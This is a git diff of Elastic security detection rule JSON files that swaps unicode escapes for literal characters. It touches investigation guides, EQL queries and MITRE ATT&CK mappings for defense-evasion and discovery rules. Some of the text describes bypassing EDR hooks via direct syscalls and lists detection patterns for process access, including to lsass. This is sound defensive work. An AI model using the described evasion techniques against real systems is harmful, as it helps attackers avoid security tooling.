b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_106.json 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_107.json b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_107.json index 42f1fd110a8..c6242687e2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_107.json 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_104.json b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_104.json index 2d50a5612bc..a7262c22982 100644 --- a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_104.json 
@@ -69,7 +69,7 @@ ], "risk_score": 73, "rule_id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_105.json b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_105.json index d2591de1d34..5c0228638b5 100644 --- a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_105.json 
@@ -69,7 +69,7 @@ ], "risk_score": 73, "rule_id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_106.json b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_106.json index a6db69d80c1..5b08134ab63 100644 --- a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_106.json 
@@ -69,7 +69,7 @@
 ],
 "risk_score": 73,
 "rule_id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_107.json b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_107.json
index 0ea656860d1..fe4021f5602 100644
--- a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_107.json
@@ -68,7 +68,7 @@
 ],
 "risk_score": 73,
 "rule_id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -80,7 +80,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_103.json b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_103.json
index f801ee1e16a..9da52d74f3e 100644
--- a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_103.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_104.json b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_104.json
index 0efd5cb8808..12c9f4394e8 100644
--- a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_104.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_204.json b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_204.json
index b8a1e84ff77..d9ccedbe321 100644
--- a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_204.json
+++ b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_204.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_205.json b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_205.json
index d48589dfb5b..e8a0c638399 100644
--- a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_205.json
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_206.json b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_206.json
index 8f6d5bbea5a..01a06ddf088 100644
--- a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_206.json
+++ b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_206.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_207.json b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_207.json
index d6490410029..eb41549b13e 100644
--- a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_207.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_104.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_104.json
index e3a6bcf9c31..7b0b8dbbaf9 100644
--- a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_104.json
@@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Access via Direct System Call", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) \u003e 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. 
It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for 
suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", "references": [ "https://twitter.com/SBousseaden/status/1278013896440324096", "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" 
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_105.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_105.json
index fbeeb3fe179..19d4c660e22 100644
--- a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_105.json
@@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Access via Direct System Call", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) \u003e 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. 
It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and 